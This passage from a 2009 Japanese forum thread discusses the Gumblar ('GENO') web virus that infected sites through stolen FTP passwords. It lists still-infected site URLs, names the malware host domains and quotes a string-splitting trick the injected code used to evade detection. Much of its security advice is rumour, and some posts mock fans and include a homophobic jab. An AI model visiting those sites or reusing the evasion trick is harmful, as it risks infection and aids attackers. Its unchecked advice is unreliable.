09/05/16 21:50:07
新たな「Webウイルス」が猛威、感染被害が急増:ITpro
URLリンク(itpro.nikkeibp.co.jp)
同社が「JSRedir-R」と命名したもの。
実体はJavaScriptで書かれたプログラム(図1)。
多くの場合、攻撃者は何らかの方法で正規サイトに不正アクセスし、
このウイルスをWebページに埋め込む。
そのページにユーザーがアクセスすると、埋め込まれたウイルスが動き出し、
別のウイルスを勝手にインストールされる恐れなどがある。
これ、GENOウィルス?
165:名無しさん@お腹いっぱい。
09/05/16 21:50:21
もしもヤフーやグーグルがやられたらどうなってしまうだろうか
166:名無しさん@お腹いっぱい。
09/05/16 21:50:31
>>155
同人だけ異様に発見されてるww
167:名無しさん@お腹いっぱい。
09/05/16 21:50:44
ウィルスセキュリティは、大丈夫ですか?
168:名無しさん@お腹いっぱい。
09/05/16 21:51:08
>>164
それだ
169:名無しさん@お腹いっぱい。
09/05/16 21:51:11
>>165
googleは一時期感染報告あったが多分デマ
170:名無しさん@お腹いっぱい。
09/05/16 21:51:21
よくわかんないけどホモサイトにいかなきゃいいんだろ
171:名無しさん@お腹いっぱい。
09/05/16 21:51:33
avastがプッシュされてるのはほかのに比べてよく検知出来てるから?
172:名無しさん@お腹いっぱい。
09/05/16 21:51:37
>>165
グーグルでも感染例が報告済み
173:140
09/05/16 21:51:37
ノートン先生は対策してるのか?
174:名無しさん@お腹いっぱい。
09/05/16 21:51:54
>>169
googleの検索結果改竄とごっちゃになってただけだと思う。
175:名無しさん@お腹いっぱい。
09/05/16 21:52:01
>>169
多分検索先読みの話がごっちゃになってたんだろな
176:名無しさん@お腹いっぱい。
09/05/16 21:52:10
>>173
ノートンはおねんねタイムだよ
177:名無しさん@お腹いっぱい。
09/05/16 21:52:26
>>170 住人だけど、大丈夫だよ。
178:名無しさん@お腹いっぱい。
09/05/16 21:52:30
過去スレ読めよ
179:名無しさん@お腹いっぱい。
09/05/16 21:52:30
>>164
俺ら大勝利wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
180:名無しさん@お腹いっぱい。
09/05/16 21:52:33
>>173
俺の隣で寝てるから安心汁
181:名無しさん@お腹いっぱい。
09/05/16 21:52:50
>>171
貧乏人が多いスレだから
182:名無しさん@お腹いっぱい。
09/05/16 21:53:07
ニコニコの覗き見検索とやらは?
183:名無しさん@お腹いっぱい。
09/05/16 21:53:12
ノートン先生は月曜にならないと起きませんw
184:名無しさん@お腹いっぱい。
09/05/16 21:53:32
スレリンク(sec板)
答えは全てここにある!
185:名無しさん@お腹いっぱい。
09/05/16 21:53:34
>>170
公式サイトでも感染してるくらいのウィルスですよ。
同人サイトも見に行かないほうがいいですが、他にも気をつけましょう。
186:名無しさん@お腹いっぱい。
09/05/16 21:53:35
>>163
>>165
だから、Linux使ってれば関係ないってば。
他の惑星系のインフレくらい影響がない。
187:名無しさん@お腹いっぱい。
09/05/16 21:53:47
>>171
このウィルスに対して反応が早かった
188:名無しさん@お腹いっぱい。
09/05/16 21:53:48
>>170
ホモというかアニメとかオタク系は全滅みたいだよ
189:名無しさん@お腹いっぱい。
09/05/16 21:54:28
>>170
へたなんとかってのが公式感染しててやばいみたいよ
メシウマですけどね
190:名無しさん@お腹いっぱい。
09/05/16 21:54:30
>>173
一緒にお風呂に入ってるよ
191:名無しさん@お腹いっぱい。
09/05/16 21:54:41
macのbootcamp使いも危ねえのかなーこれは
192:名無しさん@お腹いっぱい。
09/05/16 21:55:12
狐かoperaでおk?
193:名無しさん@お腹いっぱい。
09/05/16 21:55:13
>>173
今アップ中
月曜日まで待ってろってばっちゃが言ってた
194:127
09/05/16 21:55:32
誰か教えてくだしあ…
195:名無しさん@お腹いっぱい。
09/05/16 21:55:48
URLリンク(shop.trendmicro.co.jp)
URLリンク(shop.trendmicro.co.jp)
これは?
196:名無しさん@お腹いっぱい。
09/05/16 21:55:48
>>194
ググれ
197:名無しさん@お腹いっぱい。
09/05/16 21:55:54
>>164
図1 「JSRedir-R」の一部(ソフォスの情報から引用)。
同ウイルスの実体は、JavaScriptで記述されたプログラム。
難読化された状態でWebページに埋め込まれる
URLリンク(itpro.nikkeibp.co.jp)
198:171
09/05/16 21:56:11
>>187
なるほどThx
199:名無しさん@お腹いっぱい。
09/05/16 21:56:48
ベホマ
200:名無しさん@お腹いっぱい。
09/05/16 21:56:49
ウィルスセキュリティZEROは?
201:名無しさん@お腹いっぱい。
09/05/16 21:56:55
>>188
そういうレベルの問題じゃないよ
202:名無しさん@お腹いっぱい。
09/05/16 21:57:17
>>199
キアリーだろ
203:名無しさん@お腹いっぱい。
09/05/16 21:57:29
>>200
さようなら
204:名無しさん@お腹いっぱい。
09/05/16 21:57:35
次スレたったのか
205:名無しさん@お腹いっぱい。
09/05/16 21:57:41
>>199
あえてぱふぱふ
206:名無しさん@お腹いっぱい。
09/05/16 21:57:41
>>200
先生以外のソフトならおk!
207:名無しさん@お腹いっぱい。
09/05/16 21:57:49
>>194
avast入れればおk
対応してるかは知らないけど
208:名無しさん@お腹いっぱい。
09/05/16 21:58:02
ヒットエンドラーン
209:名無しさん@お腹いっぱい。
09/05/16 21:58:11
>>201
いや、同人関係がほとんどなんだが
210:名無しさん@お腹いっぱい。
09/05/16 21:58:13
キアリクだろ
211:名無しさん@お腹いっぱい。
09/05/16 21:58:20
>>200
インドに帰れよ
212:名無しさん@お腹いっぱい。
09/05/16 21:59:00
>>200
何それ
213:名無しさん@お腹いっぱい。
09/05/16 21:59:23
同人同人いってるが
それ含めウェブサイトがやべーっていってんだろ
214:名無しさん@お腹いっぱい。
09/05/16 21:59:27
>>200
K7って書いてくれないと通じないんだけど?
215:名無しさん@お腹いっぱい。
09/05/16 21:59:59
>>209
別に同人関係だけで出回ってるウイルスじゃないから
216:名無しさん@お腹いっぱい。
09/05/16 22:00:06
こういう時いつも思うんだが先生っていつ仕事してんのかな
217:名無しさん@お腹いっぱい。
09/05/16 22:00:16
「ウイルス対策ソフトでるから余裕w」と思ってそのまま放置とかありえそうで怖い
218:名無しさん@お腹いっぱい。
09/05/16 22:00:28
なんか同人関係を叩けば安心しちゃう変な子がいるな
219:名無しさん@お腹いっぱい。
09/05/16 22:00:35
>>197
URLリンク(itpro.nikkeibp.co.jp)
URLリンク(www.dotup.org)
うお これは感染してるページなん
220:名無しさん@お腹いっぱい。
09/05/16 22:00:39
>>164
やっと来たか…
しかしこれsophosが言ってるのを載せただけだし
日本国内のサイトがいかにやばい状態になってるかはこれじゃわからないだろうな
221:名無しさん@お腹いっぱい。
09/05/16 22:00:43
検体が欲しいのでだれか感染したサイトのURLplz
222:名無しさん@お腹いっぱい。
09/05/16 22:00:57
>>216
俺らが寝てるときこっそり仕事してるよ
223:名無しさん@お腹いっぱい。
09/05/16 22:01:46
>>216
ノートン先生の本業はPCを重くすることだぞ
224:名無しさん@お腹いっぱい。
09/05/16 22:01:48
俺の他愛ない喧嘩してんの?っていう言葉で
両親が本当に険悪な雰囲気になってしまった
これもウィルスのせい?
225:名無しさん@お腹いっぱい。
09/05/16 22:01:52
ここに書かれてる対策して、あとは月曜まで携帯でネッサ
これでおk
226:名無しさん@お腹いっぱい。
09/05/16 22:01:53
K7は、大丈夫なんでしょうか?
227:名無しさん@お腹いっぱい。
09/05/16 22:02:08
検体スレいけ
228:名無しさん@お腹いっぱい。
09/05/16 22:02:37
ペストバトロールはどうですか?
229:名無しさん@お腹いっぱい。
09/05/16 22:02:43
先生ありがとう・・・ 先生のことは忘れません・・・
230:名無しさん@お腹いっぱい。
09/05/16 22:02:46
>>226
インドへお帰りください
231:名無しさん@お腹いっぱい。
09/05/16 22:02:51
>>23
変わったって何で分かったの?
232:名無しさん@お腹いっぱい。
09/05/16 22:03:05
ノートン先生にはがんばってほしい
233:名無しさん@お腹いっぱい。
09/05/16 22:03:21
遊んでるバカが職場のPCでやらかしそうで怖い
234:名無しさん@お腹いっぱい。
09/05/16 22:03:33
>>224
主に祭り厨のせい
あいつらはとにかくスレで騒いでテンション上げることだけが目的でウイルスとかどうなってもいいんだろ
235:名無しさん@お腹いっぱい。
09/05/16 22:04:00
>>226
だから先生以外は大丈夫ってさっきから書いてるだろ
236:名無しさん@お腹いっぱい。
09/05/16 22:04:27
先生は、いつ仕事しているんですか?
237:名無しさん@お腹いっぱい。
09/05/16 22:04:29
へんなjavaスクが書いてあるページをjavaスクonにしてブラウザで表示させたらヤバいってことなら、
WWWCでアイコンを右クリック→ソースの表示
(例えばです。他にも一杯やりかたあるんだろうけど。)
で、ソースに変なコードがあるかどうか見てみればいいんじゃないの?
238:名無しさん@お腹いっぱい。
09/05/16 22:05:00
>>164
同一なら、世界でも猛威を振るっていると言うことか・・・。
239:名無しさん@お腹いっぱい。
09/05/16 22:05:03
>>226
そんなフリーソフトはダメに決まってるだろボケ
240:名無しさん@お腹いっぱい。
09/05/16 22:05:22
>>237
そんな作業が普通にできる奴なら最初から問題ないんじゃね
241:名無しさん@お腹いっぱい。
09/05/16 22:05:31
感染してる奴って自分のサイトみて気付かないわけ?
242:名無しさん@お腹いっぱい。
09/05/16 22:06:02
ゼロとキングソフトは論外
243:名無しさん@お腹いっぱい。
09/05/16 22:06:05
同人サイトから責任を逸らそうとするのが多いなww
ここ最近発見されてるのは同人だけだが…?
244:名無しさん@お腹いっぱい。
09/05/16 22:06:10
>>237
その通り。それである程度防げる
で、お前はその作業をページが移るたびにやるつもりか?
245:名無しさん@お腹いっぱい。
09/05/16 22:06:23
>>241
うんこくさいのにうんこついてない
つまりそういうこと
246:名無しさん@お腹いっぱい。
09/05/16 22:07:04
カスペなら安心ですか?
247:名無しさん@お腹いっぱい。
09/05/16 22:07:06
パスMyPicturesまたはボリュームが無効です。
削除できない
248:名無しさん@お腹いっぱい。
09/05/16 22:07:07
>>241
同人スレ行ってみな何も分かってないよ
249:名無しさん@お腹いっぱい。
09/05/16 22:07:33
URLリンク(itpro.nikkeibp.co.jp)
慌てた同人のやつらとかひっかかりそうだな
250:名無しさん@お腹いっぱい。
09/05/16 22:07:41
スレ伸び加速しすぎw
251:名無しさん@お腹いっぱい。
09/05/16 22:07:47
ああ、同人サイトって同人誌無断でアップしてるサイトじゃなくて作ってる方の連中が引っ掛かってるのか
なんか思いっきり勘違いしてた
252:名無しさん@お腹いっぱい。
09/05/16 22:07:48
>>241
このウイルスは人を脅かすのが目的ではなく
こっそり各種情報を抜き取るのが目的なんで
感染しているかどうかはできるだけ見た目で判断できないように工夫している
騒ぎの初期には「cmd.exeが起動すれば安心!」みたいなお手軽判定法があったが、
とっくに対策された亜種が出回ってるようだ。
253:名無しさん@お腹いっぱい。
09/05/16 22:08:05
>>245
じゃあ感染者がソースみてもなんも書いてないけど周りはソース改竄されてるのは見えるわけ?
254:名無しさん@お腹いっぱい。
09/05/16 22:08:29
>>23
これほんとなの?
どこ情報?
255:名無しさん@お腹いっぱい。
09/05/16 22:08:44
先生はパルスアップデートで何をアップデートしてるんだよ・・・
256:名無しさん@お腹いっぱい。
09/05/16 22:09:10
>>243
なんでそんなに同人界隈と闘いたがるの?
ウイルス問題を摩り替えてない?
257:名無しさん@お腹いっぱい。
09/05/16 22:09:17
>>255
あんなの自己満に過ぎないさ
258:名無しさん@お腹いっぱい。
09/05/16 22:09:39
マジな話だけどIE7,8の「InPrivate」使えば大丈夫じゃね?
259:名無しさん@お腹いっぱい。
09/05/16 22:09:51
>>255
ファイルの日付
260:名無しさん@お腹いっぱい。
09/05/16 22:10:17
>>244
うん。
いっつも行くサイトの更新チェックだけでもしたかったから。
でもよく考えたら、あらゆるページをそやって確認するのなんか、
確かにめんどくさ過ぎるわな。
261:名無しさん@お腹いっぱい。
09/05/16 22:10:30
>>258
おまえ感染してるよ
お疲れさん
262:名無しさん@お腹いっぱい。
09/05/16 22:10:32
>>258
大丈夫かどうか試してみ
263:名無しさん@お腹いっぱい。
09/05/16 22:10:40
検体スレってどこ?
264:名無しさん@お腹いっぱい。
09/05/16 22:11:11
WindowsUpdateが重いが
この件で殺到してるのだろうか
265:名無しさん@お腹いっぱい。
09/05/16 22:11:24
バタリアン並みの感染スピードw
266:名無しさん@お腹いっぱい。
09/05/16 22:11:41
腐とボカロと東方死亡∩(・ω・)∩バジャーイ
267:名無しさん@お腹いっぱい。
09/05/16 22:11:41
>>259
ご丁寧に時間まで更新してるらしいな
268:名無しさん@お腹いっぱい。
09/05/16 22:12:13
>>266
害悪ジャンル壊滅かざまあ
269:名無しさん@お腹いっぱい。
09/05/16 22:12:15
>>264
ソンビ化したPCがDDoSやってるのかも
270:名無しさん@お腹いっぱい。
09/05/16 22:12:30
捨てようと思ったのにエラーになるわ
271:名無しさん@お腹いっぱい。
09/05/16 22:12:31
ノートンのファン回りっぱなし状態はどうにかならないの?
272:名無しさん@お腹いっぱい。
09/05/16 22:12:31
>>265
ゾンビのくせに走るのは画期的だったな。
273:名無しさん@お腹いっぱい。
09/05/16 22:12:51
>>267
先生ちゃんと仕事してるじゃん
274:名無しさん@お腹いっぱい。
09/05/16 22:13:05
せんせいは やればできるこ
275:名無しさん@お腹いっぱい。
09/05/16 22:13:06
リカバリディスクが見つからなくてクリーンインストールできない、けれど仕事でPCを
使わざるを得ない場合はどうするのがいいんでしょうか。
276:名無しさん@お腹いっぱい。
09/05/16 22:13:17
>>261
opera使いの俺には関係ない話だ
277:名無しさん@お腹いっぱい。
09/05/16 22:13:18
>>263
【鑑定目的禁止】検出可否報告スレ10
スレリンク(sec板)
これかな?
278:名無しさん@お腹いっぱい。
09/05/16 22:13:30
>>275
仕事を辞める
279:名無しさん@お腹いっぱい。
09/05/16 22:13:32
>>266
(* >ω<)=3プー
そこらへんは全部いらないな
280:名無しさん@お腹いっぱい。
09/05/16 22:14:06
>>209
それはお前が見てるサイトだけだろ
ほかにもある
281:名無しさん@お腹いっぱい。
09/05/16 22:14:18
腐女子寝ないの?w
282:名無しさん@お腹いっぱい。
09/05/16 22:14:57
>>280
もう触るなよ
283:名無しさん@お腹いっぱい。
09/05/16 22:15:07
>>275
取扱説明書に内部リカバリ手順が載ってるならそれで
駄目ならそのまま繋いで会社全体にウイルスばら撒いて責任問題に発展させる
自殺するなよ
284:名無しさん@お腹いっぱい。
09/05/16 22:15:12
小林製薬はCM流す暇合ったら注意喚起しろよ
285:名無しさん@お腹いっぱい。
09/05/16 22:15:31
CA使ってる自分は負け組
286:名無しさん@お腹いっぱい。
09/05/16 22:15:46
同人で大事になってるのは
子供や情弱がちゃんとわかってる人に話しかけられる環境があるからだよ。
普通のコミュニティでは子供は子供、情弱は情弱でまとまってるからそのまま気づかない。
287:名無しさん@お腹いっぱい。
09/05/16 22:16:03
>>277
難しくてよくわからねえ・・・ ありがとう
288:名無しさん@お腹いっぱい。
09/05/16 22:16:03
>>275
正直に上司に相談しろ 絶対会社のネットワークに繋ぐな
289:名無しさん@お腹いっぱい。
09/05/16 22:16:07
>>279
709 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/10(金) 00:13:27
ニコ動で動画再生するとCPU使用率が
50前後ぐらいいくんだけど元々、そんなもんかねぇ
コレお前?
290:名無しさん@お腹いっぱい。
09/05/16 22:16:10
仮想化してれば平気?
291:名無しさん@お腹いっぱい。
09/05/16 22:16:31
>>285
ペンタゴンの人?
292:名無しさん@お腹いっぱい。
09/05/16 22:17:02
ネットサーフィンしてたらAVASTが警告出してきたのですぐ閉じた
感染したかと思い再起動してからウィルスチェックしたら何も無し
普通に信用して開いてたら死んでたわ
293:名無しさん@お腹いっぱい。
09/05/16 22:17:12
スレから離れられなくて、うんこ漏れそう
294:名無しさん@お腹いっぱい。
09/05/16 22:17:27
>>289
それどこのスレの奴だよw
295:名無しさん@お腹いっぱい。
09/05/16 22:17:31
>>286
ああ、それっぽいな
普通なら感染も防げるし、
もしなっても自分で調べればわかるかな
296:名無しさん@お腹いっぱい。
09/05/16 22:17:31
>>293
ノートン先生で解決だ
297:名無しさん@お腹いっぱい。
09/05/16 22:17:50
XPで管理者権限でネットやってる馬鹿が多いって笑えるね
制限者でネット繋げばウイルスソフトも要らないのにwww
298:名無しさん@お腹いっぱい。
09/05/16 22:17:59
もしニコニコとかが感染したら一気に広がりそうだなこれ
299:名無しさん@お腹いっぱい。
09/05/16 22:18:29
>>297
ウイルスソフトなんていらねえよww
300:名無しさん@お腹いっぱい。
09/05/16 22:18:45
まだ腐ヲチ・同人ヲチしてるやつはなんなの?自分が荒らしてることに気づかないの?
301:名無しさん@お腹いっぱい。
09/05/16 22:18:45
>>298
とっくにやられてたわけだが
302:名無しさん@お腹いっぱい。
09/05/16 22:18:47
513 名前:geno[sage] 投稿日:2009/05/16(土) 21:56:55 ID:GQnaax2E0
痛ニュとかの有名どころのコピペブログ感染してるな
ライブドアもか
303:名無しさん@お腹いっぱい。
09/05/16 22:18:50
>>296
垂れ流しちゃえ
304:名無しさん@お腹いっぱい。
09/05/16 22:19:07
>>296
先生万能すぐる
305:名無しさん@お腹いっぱい。
09/05/16 22:19:14
>>299
恒例の流れになってんなw
306:名無しさん@お腹いっぱい。
09/05/16 22:19:44
>283
内部リカバリーの存在をすっかり忘れていました!
マジで感謝です。
これってパーティションで区切ってあるDドライブの方はそのままでも大丈夫ですか?
307:名無しさん@お腹いっぱい。
09/05/16 22:19:47
サイトにウィルスコードを埋め込むってウィルスから取得したパスワードとかの
情報を使って第三者が改ざんするってこと?
308:名無しさん@お腹いっぱい。
09/05/16 22:19:48
ウイルスソフトって何?
バスターのことかい?
309:名無しさん@お腹いっぱい。
09/05/16 22:19:58
>>301
やられてたのはsaymoveの覗き見検索じゃないのか?
ニコニコ自体がやられてたら、それはそれでおもしろそうなんだが
310:名無しさん@お腹いっぱい。
09/05/16 22:20:20
東方ジャンルが死んだのはめでたい
311:名無しさん@お腹いっぱい。
09/05/16 22:20:37
javaオフでも感染する場合があるんだっけ?
もうフラフラできんな
2chブラウザで2chしか見れなくなりそう
312:名無しさん@お腹いっぱい。
09/05/16 22:20:42
>>306
やるだけやってみて駄目なら諦めたら?
313:名無しさん@お腹いっぱい。
09/05/16 22:20:46
>>307
FTPで接続したときパスとかバレて第三者に云々
314:名無しさん@お腹いっぱい。
09/05/16 22:21:03
パケモン感染しねえかな
315:名無しさん@お腹いっぱい。
09/05/16 22:21:41
野球やろーぜ
316:名無しさん@お腹いっぱい。
09/05/16 22:21:46
エロマンガサイトで感染したのって出た?
317:名無しさん@お腹いっぱい。
09/05/16 22:22:13
>>302
釣り乙
318:名無しさん@お腹いっぱい。
09/05/16 22:22:19
野球ch感染してるんじゃね?
319:名無しさん@お腹いっぱい。
09/05/16 22:22:21
>>316
またエロマンガ見てる・・・
320:名無しさん@お腹いっぱい。
09/05/16 22:22:39
そりゃウイルス作者だって書き込めるんだしチェックは絶対してるんだろうから
荒らしもするんじゃない?
321:名無しさん@お腹いっぱい。
09/05/16 22:23:21
>>164
正規サイトに感染広がる:新手のWebベースマルウェアが急拡大 - ITmedia エンタープライズ
URLリンク(www.itmedia.co.jp)
これもGENOウィルスかな。
322:名無しさん@お腹いっぱい。
09/05/16 22:23:54
>>286
同人関係はネット上で規模のあるコミュニティを形成してるから
情報が伝わりやすいってのがあるんじゃないか?絶対数の差もあるんだろうけど。
いかにも一般人な人がやってるサイトだとそういう情報って伝播しにくいだろうな。
ここですらよく判ってない奴多すぎだし、IT情報に疎い種類の連中は大変だ。
323:名無しさん@お腹いっぱい。
09/05/16 22:24:28
壺に入ってたら大騒ぎだろうな
324:名無しさん@お腹いっぱい。
09/05/16 22:24:31
>>221
>>1のサイトとリンク先を参考にした現在の感染サイト
スレで報告あったサイト含む
漏れがあったらレスよろ
p-frying■com/
www■zengozen■co■jp/pic/keturosyumire-syonn■htm
skyhighpremium■com/
sound■jp/yudai_marimba/
www■thesis-report■com/
www■joyjoynet■com/
www■ti-a-ra■com/
www1■odn■ne■jp/revue1999/
www■nifty-hair■com/
www■k-q-bury■com/
expss■main■jp/expss2/2005/01/
www■livmail■com/
325:名無しさん@お腹いっぱい。
09/05/16 22:24:50
同人・ヲタ系以外で感染してる有名サイトってどこなんだ?
326:名無しさん@お腹いっぱい。
09/05/16 22:25:25
>>313
そうゆうことかありがとう、じゃあ自分のブログはFTP接続じゃないから大丈夫だな。
327:名無しさん@お腹いっぱい。
09/05/16 22:26:17
うぜええ
328:名無しさん@お腹いっぱい。
09/05/16 22:26:41
>>324
www■senlights■co■jp/seihin/kirenaru-1s■htm
俺はここから感染してるっぽい
329:名無しさん@お腹いっぱい。
09/05/16 22:27:19
>>298
2chと関わりのあるBIG-server.comが感染してた事例もあるからなあ
ニコ動も無縁ではないかも
【BIG-server.com】maido3.comがウイルスにより改竄、ウイルススキャンのお願いとお詫び[05/11]
スレリンク(owabiplus板)
330:名無しさん@お腹いっぱい。
09/05/16 22:28:04
ふたば感染してるって全板感染してるの?
331:名無しさん@お腹いっぱい。
09/05/16 22:28:25
ウィルス、命名されたか。(多分)海外での感染源は、トラフィックの多いアダルトサイトか。
しかし、検出可否スレでも新種が見つかっているようだな・・・。
332:名無しさん@お腹いっぱい。
09/05/16 22:28:37
ふたばはガセじゃなかったか
333:名無しさん@お腹いっぱい。
09/05/16 22:29:13
74 ヤマボウシ(dion軍) [sage] 2009/05/16(土) 22:01:12.03 ID:qgx0kH7v
【特徴】
・亜種大杉 セキュリティソフトが対応しきれていない
症状もまちまちでいまいち決定打が無い
・ftpを介して感染者のサイトをゾンビ化
・トラフィックが監視されてるから、ID・Passやクレカ番号が筒抜け
Botnet汚染や、キャプチャ画像の送信の疑いと言う情報もあり
・クリーンインストールが唯一の対処法
・キンタマなどとは違い感染源が明確なので、
感染源の企業などから圧力がかかってしまう。よってマスコミの報道も消極的
334:名無しさん@お腹いっぱい。
09/05/16 22:29:22
ソースチェッカーでなにも出ない場合は少しは安心してもいいんですかね
335:名無しさん@お腹いっぱい。
09/05/16 22:29:58
>>334
ユーザーエージェントみてるからSCOでも変えないとでない
336:名無しさん@お腹いっぱい。
09/05/16 22:30:26
ニュースサイトどっか取り上げてないのん
337:名無しさん@お腹いっぱい。
09/05/16 22:30:38
>>311
何度も出てるけどJavaScriptな
338:名無しさん@お腹いっぱい。
09/05/16 22:30:42
さっきエクスプローラーが異常終了してびびった。
cmdもregeditも起動するしsqlsodbc.chmも問題なかった。
怖いからwin7beta使うことにする。
339:名無しさん@お腹いっぱい。
09/05/16 22:31:22
avastでスキャンする場合圧縮ファイルもやったほうがいいの?
340:名無しさん@お腹いっぱい。
09/05/16 22:31:28
>>334
ソースの内容まで見ろよ
安全度100%でも感染してる
341:名無しさん@お腹いっぱい。
09/05/16 22:32:13
2chが感染したら日本終わるな
342:名無しさん@お腹いっぱい。
09/05/16 22:33:29
信じられるのは自分だけだってばっちゃが言ってた
343:名無しさん@お腹いっぱい。
09/05/16 22:34:02
>>294
714 名前:709[sage] 投稿日:2009/04/10(金) 00:33:30
>>713
>>709は私だ(* >ω<)=3プー
GENOウイルススレ 「1」だw
344:名無しさん@お腹いっぱい。
09/05/16 22:34:37
>>328
martuz.cnに飛ばされるね。
比較的最近感染したサイトのかもしれない。
345:名無しさん@お腹いっぱい。
09/05/16 22:36:20
>>344
へえそうなんだ 怖くて開けられないけど
親父がIE7でそこ閲覧した時に感染したっぽい
346:名無しさん@お腹いっぱい。
09/05/16 22:36:40
クリーンインスコしてもFTPのパス変えないと意味ないってさ
また改竄されるらしい
347:名無しさん@お腹いっぱい。
09/05/16 22:37:00
>>326
FTPだけじゃないです
348:名無しさん@お腹いっぱい。
09/05/16 22:37:31
知ってるから
349:名無しさん@お腹いっぱい。
09/05/16 22:37:45
ホラー映画作れそう
350:名無しさん@お腹いっぱい。
09/05/16 22:37:57
DLsite.comだけは
感染しませんように( -人-)
351:名無しさん@お腹いっぱい。
09/05/16 22:37:57
>>324
Firefoxでアクセスしてみたけど全部
martuz■cn/vid/?id=
からファイルを取ろうとするね。それでそこに直接行っても
// No news...
と表示されるだけ。。IEじゃないとだめか・・
352:名無しさん@お腹いっぱい。
09/05/16 22:38:35
なんか話通じない人いるよね
353:名無しさん@お腹いっぱい。
09/05/16 22:39:02
>>347
FTPて何だか教えて下さい
354:名無しさん@お腹いっぱい。
09/05/16 22:39:41
巨大ボットネット発見,190万台の感染マシンで構成
URLリンク(itpro.nikkeibp.co.jp)
355:名無しさん@お腹いっぱい。
09/05/16 22:40:15
よく分からんけど
.cnを全部弾いたらおk?
356:名無しさん@お腹いっぱい。
09/05/16 22:40:31
スレの最初に書いてる以外の方法で感染確認する方法はない?
357:名無しさん@お腹いっぱい。
09/05/16 22:40:37
>>353
知らないなら気にしなくて良い
358:名無しさん@お腹いっぱい。
09/05/16 22:40:40
>>318 なん実Jにも広がってるなw
URLリンク(baseball.fan-site.net)
359:名無しさん@お腹いっぱい。
09/05/16 22:40:40
ひどい広がり様
360:名無しさん@お腹いっぱい。
09/05/16 22:40:59
>>328
unescapeしてみたよ
martuz.cn だってさ
ホームページトップからして改ざんされとった
こりゃパターンマッチむずいな...
src=//mar"+"tux.cn/vid
とかなってた。連結の位置ずらしただけでマッチしないよねぇ
361:名無しさん@お腹いっぱい。
09/05/16 22:41:16
662 名前:GENO 報告 [sage] 投稿日:2009/05/16(土) 22:37:44 ID:5Y6mJ8vc0
商業乙女ゲー(PC)のリボンマジック公式サイト
アクセスしようとするとGoogleにブロックされて下記のメッセージ
>不正なソフトウェアは gumblar.cn/ を含む 1 個のドメインでホストされています。
362:名無しさん@お腹いっぱい。
09/05/16 22:42:04
他人に感染させる経路はFTPだけ?
フラッシュメモリからなら感染したPCからデータ受け取っても大丈夫?
363:名無しさん@お腹いっぱい。
09/05/16 22:42:16
>>354
さらに強まったのが出てきそうだな
364:名無しさん@お腹いっぱい。
09/05/16 22:43:06
>>361
また公式サイトが
365:名無しさん@お腹いっぱい。
09/05/16 22:43:52
>>344
4/29の正午ぐらいに閲覧した時に感染したかもしれん
GENOの初出はいつだっけ
366:名無しさん@お腹いっぱい。
09/05/16 22:44:55
感染してないけど何か不安だな
サイト一旦閉じて沈静化待つべきか
367:名無しさん@お腹いっぱい。
09/05/16 22:45:06
しかし何でこんな急速に広まったんだ
もう下火ってイメージだったのに
368:名無しさん@お腹いっぱい。
09/05/16 22:45:45
GENOはhostsで禁止してるからもう2度と見たい
369:名無しさん@お腹いっぱい。
09/05/16 22:45:46
腐女子が騒いだ
370:名無しさん@お腹いっぱい。
09/05/16 22:45:48
なんか具体的な情報が今一つ分からんな。
Javascriptは只のダウンローダで、Adobe Reader、Flash Playerの脆弱性を突いて勝手にダウンロードするとかいう仕組み?
最近のサイト改ざんはMS鯖の脆弱性を突いてるのが多いが、同人サイトみたいなのがやられてるってのは、今回のは違うっぽいのか。
371:名無しさん@お腹いっぱい。
09/05/16 22:45:58
ニコ動とpixivと2chにかまけて自サイトずっと放置してて良かった
372:名無しさん@お腹いっぱい。
09/05/16 22:46:25
>>368
どっちだよw
373:名無しさん@お腹いっぱい。
09/05/16 22:46:41
>>367
GENOの対応
小遣いサイトや小林製薬など中年層が感染して気付かず放置
374:名無しさん@お腹いっぱい。
09/05/16 22:46:53
>>367
同人版の奴らが調べだしたから
375:名無しさん@お腹いっぱい。
09/05/16 22:46:53
>>370
そうだけど、ftpからの改竄は別物だよ
376:名無しさん@お腹いっぱい。
09/05/16 22:46:59
>>365
GENOで感染、で騒がれ始めたのは確か4月5日あたり
実際には3月28日頃からポツポツとあったらしい
377:名無しさん@お腹いっぱい。
09/05/16 22:47:45
初期に感染してた奴らは何見て感染したんだか
378:名無しさん@お腹いっぱい。
09/05/16 22:48:24
GENO
379:名無しさん@お腹いっぱい。
09/05/16 22:48:46
>>365
326 名前:名無しさん[sage] 投稿日:2009/04/04(土) 10:43:40 0
GENOのHPにアクセスしようとしたら、Acrobat Plug-in が起動して
This operation is not allowed. と表示する。
2台試して、2台とも起きた。
もしかしてウィルスに感染してる?
これが最初
380:名無しさん@お腹いっぱい。
09/05/16 22:48:50
GENO先生
381:名無しさん@お腹いっぱい。
09/05/16 22:49:08
>>379
それ違う
深夜3時くらいのがあったはず
382:名無しさん@お腹いっぱい。
09/05/16 22:49:12
>>370
傍受したFTP接続情報を元に普通に接続して改ざんするからね。
サーバーのOSは関係無いよ。
逆に言えば感染後にFTPで通信していなければ、FTP接続情報は漏れない。
383:名無しさん@お腹いっぱい。
09/05/16 22:49:15
GENOがもっとウィルスについて説明していれば良かったのに
384:名無しさん@お腹いっぱい。
09/05/16 22:50:22
>>368
はっきりしなさい!
385:名無しさん@お腹いっぱい。
09/05/16 22:50:37
>>376
あーほんとだ
最近なんだ ありがとう
386:名無しさん@お腹いっぱい。
09/05/16 22:50:44
GENOのキャッシュ消せばダイジョブって説明を鵜呑みにしてました!><;
387:名無しさん@お腹いっぱい。
09/05/16 22:51:28
いいから黙ってキャッシュ消せよ
388:名無しさん@お腹いっぱい。
09/05/16 22:51:33
avast使ってれば問題ないってことか?
389:名無しさん@お腹いっぱい。
09/05/16 22:51:50
GENO体質
390:名無しさん@お腹いっぱい。
09/05/16 22:51:59
林明美のHP踏むとavast反応するらしいけどアドレスが分からぬ
391:名無しさん@お腹いっぱい。
09/05/16 22:52:09
俺は今日はじめて知ったけど、けっこう前から出回ってたんだね。
じゃあ、なぜ俺様の購入した優秀なノートン様が未対応なんだ?
それとも闘ってくれてるのか?
392:名無しさん@お腹いっぱい。
09/05/16 22:52:23
もう感染報告から一カ月以上たつのに
いまだに対策されてないサイトがこんなにあるんだな
393:名無しさん@お腹いっぱい。
09/05/16 22:52:26
>>375 >>382 ありがトン
感染後にFTPのパスを盗むんだな。その後鯖に勝手にアクセスしてソース改ざんかw 凝ってるなあ。
仮にこのパターンばっかりだったらFTPへのアクセスログでも見とけば良いのか。
